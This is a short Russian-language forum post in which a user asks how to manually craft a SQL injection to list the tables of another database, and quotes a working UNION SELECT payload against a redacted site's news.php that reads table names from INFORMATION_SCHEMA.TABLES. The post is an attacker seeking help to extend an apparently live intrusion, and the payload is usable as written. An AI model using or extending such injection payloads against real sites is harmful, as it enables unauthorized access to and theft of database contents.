Показать сообщение отдельно
Старый 12.05.2021, 16:07   #3620
Muract
 
Регистрация: 15.12.2017
Сообщений: 1
Репутация: 0
По умолчанию

Как построить запрос в sqi injection вручную, чтобы посмотреть таблицы другой базы(если есть?)
Уязвимый запрос срабатывает
"http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1 --"
Muract вне форума   Ответить с цитированием